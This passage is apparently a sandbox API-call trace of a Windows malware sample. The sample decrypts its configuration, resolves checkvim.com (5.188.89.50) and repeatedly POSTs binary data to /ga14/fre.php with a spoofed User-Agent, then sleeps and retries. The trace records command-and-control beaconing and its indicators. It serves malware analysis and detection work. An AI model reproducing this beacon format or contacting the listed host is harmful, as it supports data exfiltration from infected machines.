[0226.609] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0226.610] CryptSetKeyParam (hKey=0x87e270, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0226.610] GetProcessHeap () returned 0x840000 [0226.610] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x870848 | out: hHeap=0x840000) returned 1 [0226.611] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0226.611] CryptDecrypt (in: hKey=0x87e270, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x87f710, pdwDataLen=0x19f9a4 | out: pbData=0x87f710, pdwDataLen=0x19f9a4) returned 1 [0226.617] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0226.617] CryptDestroyKey (hKey=0x87e270) returned 1 [0226.618] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0226.619] CryptReleaseContext (hProv=0x86f688, dwFlags=0x0) returned 1 [0226.619] GetProcessHeap () returned 0x840000 [0226.619] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x212) returned 0x870228 [0226.620] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0226.620] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x9c\x97\x9a\x9c\x94\x89\x96\x92Ñ\x9c\x90\x92Ð\x98\x9eÎËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0226.621] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0226.621] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x9c\x97\x9a\x9c\x94\x89\x96\x92Ñ\x9c\x90\x92Ð\x98\x9eÎËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0226.625] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0226.625] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x9c\x97\x9a\x9c\x94\x89\x96\x92Ñ\x9c\x90\x92Ð\x98\x9eÎËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0226.626] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0226.626] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x9c\x97\x9a\x9c\x94\x89\x96\x92Ñ\x9c\x90\x92Ð\x98\x9eÎËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0226.626] GetProcessHeap () returned 0x840000 [0226.626] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x20) returned 0x871470 [0226.626] getaddrinfo (in: pNodeName="\x97\x8b\x8b\x8fÅÐÐ\x9c\x97\x9a\x9c\x94\x89\x96\x92Ñ\x9c\x90\x92Ð\x98\x9eÎËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19f960*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19f980 | out: ppResult=0x19f980*=0x0) returned 11001 [0226.627] GetProcessHeap () returned 0x840000 [0226.627] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x871470 | out: hHeap=0x840000) returned 1 [0226.627] GetProcessHeap () returned 0x840000 [0226.627] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x870228 | out: hHeap=0x840000) returned 1 [0226.627] GetProcessHeap () returned 0x840000 [0226.627] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x87f710 | out: hHeap=0x840000) returned 1 [0226.627] GetProcessHeap () returned 0x840000 [0226.627] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x40) returned 0x87f878 [0226.627] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0226.628] CryptAcquireContextW (in: phProv=0x19f950, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19f950*=0x0) returned 1 [0226.637] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0226.637] CryptAcquireContextW (in: phProv=0x19f950, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19f950*=0x86fb50) returned 1 [0226.861] GetProcessHeap () returned 0x840000 [0226.861] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x24) returned 0x870848 [0226.862] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0226.862] CryptImportKey (in: hProv=0x86fb50, pbData=0x870848, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19f954 | out: phKey=0x19f954*=0x87e4f0) returned 1 [0226.863] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0226.864] CryptSetKeyParam (hKey=0x87e4f0, dwParam=0x4, pbData=0x19f94c*=0x1, dwFlags=0x0) returned 1 [0226.864] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0226.865] CryptSetKeyParam (hKey=0x87e4f0, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0226.865] GetProcessHeap () returned 0x840000 [0226.865] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x870848 | out: hHeap=0x840000) returned 1 [0226.866] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0226.866] CryptDecrypt (in: hKey=0x87e4f0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x87f878, pdwDataLen=0x19f9a4 | out: pbData=0x87f878, pdwDataLen=0x19f9a4) returned 1 [0226.867] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0226.867] CryptDestroyKey (hKey=0x87e4f0) returned 1 [0226.868] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0226.868] CryptReleaseContext (hProv=0x86fb50, dwFlags=0x0) returned 1 [0226.868] GetProcessHeap () returned 0x840000 [0226.868] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x212) returned 0x870228 [0226.869] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0226.870] StrStrA (lpFirst="http://checkvim.com/ga14/fre.php", lpSrch="http://") returned="http://checkvim.com/ga14/fre.php" [0226.870] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0226.892] StrStrA (lpFirst="checkvim.com/ga14/fre.php", lpSrch="/") returned="/ga14/fre.php" [0226.893] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0226.893] StrStrA (lpFirst="checkvim.com/ga14/fre.php", lpSrch=":") returned 0x0 [0226.893] GetProcessHeap () returned 0x840000 [0226.893] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x20) returned 0x871330 [0226.894] getaddrinfo (in: pNodeName="checkvim.com", pServiceName="80", pHints=0x19f960*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19f980 | out: ppResult=0x19f980*=0x871510*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x878a70*(sa_family=2, sin_port=0x50, sin_addr="5.188.89.50"), ai_next=0x0)) returned 0 [0226.895] GetProcessHeap () returned 0x840000 [0226.895] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x4) returned 0x871b28 [0226.895] socket (af=2, type=1, protocol=6) returned 0x2f4 [0226.896] connect (s=0x2f4, name=0x878a70*(sa_family=2, sin_port=0x50, sin_addr="5.188.89.50"), namelen=16) returned 0 [0226.966] FreeAddrInfoW (pAddrInfo=0x871510*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x878a70*(sa_family=2, sin_port=0x50, sin_addr="5.188.89.50"), ai_next=0x0)) [0226.966] GetProcessHeap () returned 0x840000 [0226.967] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x7d) returned 0x86f820 [0226.967] GetProcessHeap () returned 0x840000 [0226.967] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x201b) returned 0x8805c8 [0226.968] LoadLibraryW (lpLibFileName="user32") returned 0x76300000 [0226.969] wvsprintfA (in: param_1=0x8805c8, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19f988 | out: param_1="POST /ga14/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: checkvim.com\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 172 [0226.969] GetProcessHeap () returned 0x840000 [0226.969] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0xae) returned 0x870448 [0226.969] GetProcessHeap () returned 0x840000 [0226.969] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x8805c8 | out: hHeap=0x840000) returned 1 [0226.969] GetProcessHeap () returned 0x840000 [0226.969] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x3e) returned 0x87fd88 [0226.970] GetProcessHeap () returned 0x840000 [0226.970] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x1fdc) returned 0x8805c8 [0226.970] LoadLibraryW (lpLibFileName="user32") returned 0x76300000 [0226.971] wvsprintfA (in: param_1=0x8805c8, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19f988 | out: param_1="POST /ga14/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: checkvim.com\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 66369A18\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 237 [0226.971] GetProcessHeap () returned 0x840000 [0226.971] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0xef) returned 0x873a58 [0226.971] GetProcessHeap () returned 0x840000 [0226.971] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x8805c8 | out: hHeap=0x840000) returned 1 [0226.971] send (s=0x2f4, buf=0x873a58*, len=237, flags=0) returned 237 [0226.972] send (s=0x2f4, buf=0x87eb58*, len=159, flags=0) returned 159 [0226.972] GetProcessHeap () returned 0x840000 [0226.972] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0xfd0) returned 0x8765b0 [0226.972] recv (in: s=0x2f4, buf=0x8765b0, len=4048, flags=0 | out: buf=0x8765b0*) returned 237 [0227.326] GetProcessHeap () returned 0x840000 [0227.326] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x873a58 | out: hHeap=0x840000) returned 1 [0227.326] GetProcessHeap () returned 0x840000 [0227.326] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x87fd88 | out: hHeap=0x840000) returned 1 [0227.326] GetProcessHeap () returned 0x840000 [0227.326] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x870448 | out: hHeap=0x840000) returned 1 [0227.326] GetProcessHeap () returned 0x840000 [0227.326] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x86f820 | out: hHeap=0x840000) returned 1 [0227.326] closesocket (s=0x2f4) returned 0 [0227.353] GetProcessHeap () returned 0x840000 [0227.353] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x871b28 | out: hHeap=0x840000) returned 1 [0227.354] GetProcessHeap () returned 0x840000 [0227.354] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x870228 | out: hHeap=0x840000) returned 1 [0227.354] GetProcessHeap () returned 0x840000 [0227.354] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x87f878 | out: hHeap=0x840000) returned 1 [0227.354] GetProcessHeap () returned 0x840000 [0227.354] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x871330 | out: hHeap=0x840000) returned 1 [0227.354] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x8765b0, dwCreationFlags=0x0, lpThreadId=0x19fbb0 | out: lpThreadId=0x19fbb0*=0xda8) returned 0x2f4 [0227.355] Sleep (dwMilliseconds=0xea60) [0227.357] GetProcessHeap () returned 0x840000 [0227.357] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x40) returned 0x87fdd0 [0227.357] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0227.358] CryptAcquireContextW (in: phProv=0x19f950, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19f950*=0x0) returned 1 [0227.387] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0227.388] CryptAcquireContextW (in: phProv=0x19f950, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19f950*=0x86f798) returned 1 [0227.401] GetProcessHeap () returned 0x840000 [0227.401] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x24) returned 0x870848 [0227.402] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0227.403] CryptImportKey (in: hProv=0x86f798, pbData=0x870848, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19f954 | out: phKey=0x19f954*=0x87e8f0) returned 1 [0227.429] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0227.433] CryptSetKeyParam (hKey=0x87e8f0, dwParam=0x4, pbData=0x19f94c*=0x1, dwFlags=0x0) returned 1 [0227.435] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0227.436] CryptSetKeyParam (hKey=0x87e8f0, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0227.436] GetProcessHeap () returned 0x840000 [0227.436] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x870848 | out: hHeap=0x840000) returned 1 [0227.437] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0227.438] CryptDecrypt (in: hKey=0x87e8f0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x87fdd0, pdwDataLen=0x19f9a4 | out: pbData=0x87fdd0, pdwDataLen=0x19f9a4) returned 1 [0227.439] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0227.439] CryptDestroyKey (hKey=0x87e8f0) returned 1 [0227.440] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0227.440] CryptReleaseContext (hProv=0x86f798, dwFlags=0x0) returned 1 [0227.440] GetProcessHeap () returned 0x840000 [0227.440] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x212) returned 0x870228 [0227.442] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0227.448] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x9c\x97\x9a\x9c\x94\x89\x96\x92Ñ\x9c\x90\x92Ð\x98\x9eÎËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0227.449] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0227.449] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x9c\x97\x9a\x9c\x94\x89\x96\x92Ñ\x9c\x90\x92Ð\x98\x9eÎËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0227.450] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0227.451] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x9c\x97\x9a\x9c\x94\x89\x96\x92Ñ\x9c\x90\x92Ð\x98\x9eÎËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0227.452] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0227.452] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x9c\x97\x9a\x9c\x94\x89\x96\x92Ñ\x9c\x90\x92Ð\x98\x9eÎËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0227.452] GetProcessHeap () returned 0x840000 [0227.452] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x20) returned 0x871128 [0227.452] getaddrinfo (in: pNodeName="\x97\x8b\x8b\x8fÅÐÐ\x9c\x97\x9a\x9c\x94\x89\x96\x92Ñ\x9c\x90\x92Ð\x98\x9eÎËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19f960*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19f980 | out: ppResult=0x19f980*=0x0) returned 11001 [0227.453] GetProcessHeap () returned 0x840000 [0227.453] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x871128 | out: hHeap=0x840000) returned 1 [0227.453] GetProcessHeap () returned 0x840000 [0227.453] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x870228 | out: hHeap=0x840000) returned 1 [0227.453] GetProcessHeap () returned 0x840000 [0227.453] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x87fdd0 | out: hHeap=0x840000) returned 1 [0227.453] GetProcessHeap () returned 0x840000 [0227.453] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x40) returned 0x87fa28 [0227.454] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0227.454] CryptAcquireContextW (in: phProv=0x19f950, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19f950*=0x0) returned 1 [0227.461] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0227.461] CryptAcquireContextW (in: phProv=0x19f950, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19f950*=0x86ff90) returned 1 [0227.468] GetProcessHeap () returned 0x840000 [0227.468] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x24) returned 0x870818 [0227.468] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0227.469] CryptImportKey (in: hProv=0x86ff90, pbData=0x870818, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19f954 | out: phKey=0x19f954*=0x87e6f0) returned 1 [0227.469] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0227.470] CryptSetKeyParam (hKey=0x87e6f0, dwParam=0x4, pbData=0x19f94c*=0x1, dwFlags=0x0) returned 1 [0227.470] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0227.471] CryptSetKeyParam (hKey=0x87e6f0, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0227.471] GetProcessHeap () returned 0x840000 [0227.471] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x870818 | out: hHeap=0x840000) returned 1 [0227.471] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0227.471] CryptDecrypt (in: hKey=0x87e6f0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x87fa28, pdwDataLen=0x19f9a4 | out: pbData=0x87fa28, pdwDataLen=0x19f9a4) returned 1 [0227.472] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0227.472] CryptDestroyKey (hKey=0x87e6f0) returned 1 [0227.473] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0227.473] CryptReleaseContext (hProv=0x86ff90, dwFlags=0x0) returned 1 [0227.473] GetProcessHeap () returned 0x840000 [0227.473] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x212) returned 0x870228 [0227.474] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0227.474] StrStrA (lpFirst="http://checkvim.com/ga14/fre.php", lpSrch="http://") returned="http://checkvim.com/ga14/fre.php" [0227.475] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0227.476] StrStrA (lpFirst="checkvim.com/ga14/fre.php", lpSrch="/") returned="/ga14/fre.php" [0227.476] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0227.477] StrStrA (lpFirst="checkvim.com/ga14/fre.php", lpSrch=":") returned 0x0 [0227.477] GetProcessHeap () returned 0x840000 [0227.477] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x20) returned 0x871470 [0227.477] getaddrinfo (in: pNodeName="checkvim.com", pServiceName="80", pHints=0x19f960*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19f980 | out: ppResult=0x19f980*=0x871330*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x878a70*(sa_family=2, sin_port=0x50, sin_addr="5.188.89.50"), ai_next=0x0)) returned 0 [0227.515] GetProcessHeap () returned 0x840000 [0227.515] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x4) returned 0x871ba8 [0227.515] socket (af=2, type=1, protocol=6) returned 0x2f8 [0227.515] connect (s=0x2f8, name=0x878a70*(sa_family=2, sin_port=0x50, sin_addr="5.188.89.50"), namelen=16) returned 0 [0227.587] FreeAddrInfoW (pAddrInfo=0x871330*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x878a70*(sa_family=2, sin_port=0x50, sin_addr="5.188.89.50"), ai_next=0x0)) [0227.587] GetProcessHeap () returned 0x840000 [0227.587] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x7d) returned 0x86ff90 [0227.587] GetProcessHeap () returned 0x840000 [0227.587] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x201b) returned 0x8805c8 [0227.588] LoadLibraryW (lpLibFileName="user32") returned 0x76300000 [0227.589] wvsprintfA (in: param_1=0x8805c8, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19f988 | out: param_1="POST /ga14/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: checkvim.com\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 172 [0227.590] GetProcessHeap () returned 0x840000 [0227.590] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0xae) returned 0x870448 [0227.590] GetProcessHeap () returned 0x840000 [0227.590] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x8805c8 | out: hHeap=0x840000) returned 1 [0227.590] GetProcessHeap () returned 0x840000 [0227.590] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x3e) returned 0x87fab8 [0227.590] GetProcessHeap () returned 0x840000 [0227.590] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x1fdc) returned 0x8805c8 [0227.591] LoadLibraryW (lpLibFileName="user32") returned 0x76300000 [0227.592] wvsprintfA (in: param_1=0x8805c8, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19f988 | out: param_1="POST /ga14/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: checkvim.com\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 66369A18\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 237 [0227.592] GetProcessHeap () returned 0x840000 [0227.592] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0xef) returned 0x873a58 [0227.592] GetProcessHeap () returned 0x840000 [0227.592] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x8805c8 | out: hHeap=0x840000) returned 1 [0227.592] send (s=0x2f8, buf=0x873a58*, len=237, flags=0) returned 237 [0227.592] send (s=0x2f8, buf=0x87eb58*, len=159, flags=0) returned 159 [0227.593] GetProcessHeap () returned 0x840000 [0227.593] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0xfd0) returned 0x8765b0 [0227.593] recv (in: s=0x2f8, buf=0x8765b0, len=4048, flags=0 | out: buf=0x8765b0*) returned 237 [0227.949] GetProcessHeap () returned 0x840000 [0227.949] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x873a58 | out: hHeap=0x840000) returned 1 [0227.949] GetProcessHeap () returned 0x840000 [0227.949] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x87fab8 | out: hHeap=0x840000) returned 1 [0227.949] GetProcessHeap () returned 0x840000 [0227.949] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x870448 | out: hHeap=0x840000) returned 1 [0227.949] GetProcessHeap () returned 0x840000 [0227.949] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x86ff90 | out: hHeap=0x840000) returned 1 [0227.949] closesocket (s=0x2f8) returned 0 [0227.950] GetProcessHeap () returned 0x840000 [0227.950] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x871ba8 | out: hHeap=0x840000) returned 1 [0227.951] GetProcessHeap () returned 0x840000 [0227.951] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x870228 | out: hHeap=0x840000) returned 1 [0227.951] GetProcessHeap () returned 0x840000 [0227.951] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x87fa28 | out: hHeap=0x840000) returned 1 [0227.951] GetProcessHeap () returned 0x840000 [0227.951] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x871470 | out: hHeap=0x840000) returned 1 [0227.951] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x8765b0, dwCreationFlags=0x0, lpThreadId=0x19fbb0 | out: lpThreadId=0x19fbb0*=0xf74) returned 0x2f8 [0227.953] Sleep (dwMilliseconds=0xea60) [0227.954] GetProcessHeap () returned 0x840000 [0227.954] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x40) returned 0x87f8c0 [0227.955] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0227.955] CryptAcquireContextW (in: phProv=0x19f950, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19f950*=0x0) returned 1 [0227.963] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0227.963] CryptAcquireContextW (in: phProv=0x19f950, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19f950*=0x86f688) returned 1 [0227.971] GetProcessHeap () returned 0x840000 [0227.972] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x24) returned 0x8708a8 [0227.972] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0227.973] CryptImportKey (in: hProv=0x86f688, pbData=0x8708a8, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19f954 | out: phKey=0x19f954*=0x87e270) returned 1 [0227.973] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0227.974] CryptSetKeyParam (hKey=0x87e270, dwParam=0x4, pbData=0x19f94c*=0x1, dwFlags=0x0) returned 1 [0227.974] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0227.974] CryptSetKeyParam (hKey=0x87e270, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0227.974] GetProcessHeap () returned 0x840000 [0227.974] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x8708a8 | out: hHeap=0x840000) returned 1 [0227.975] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0227.975] CryptDecrypt (in: hKey=0x87e270, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x87f8c0, pdwDataLen=0x19f9a4 | out: pbData=0x87f8c0, pdwDataLen=0x19f9a4) returned 1 [0227.976] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0227.976] CryptDestroyKey (hKey=0x87e270) returned 1 [0227.977] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0227.977] CryptReleaseContext (hProv=0x86f688, dwFlags=0x0) returned 1 [0227.977] GetProcessHeap () returned 0x840000 [0227.977] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x212) returned 0x872af8 [0227.978] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0227.978] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x9c\x97\x9a\x9c\x94\x89\x96\x92Ñ\x9c\x90\x92Ð\x98\x9eÎËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0227.979] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0227.980] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x9c\x97\x9a\x9c\x94\x89\x96\x92Ñ\x9c\x90\x92Ð\x98\x9eÎËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0227.980] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0227.981] StrStrA 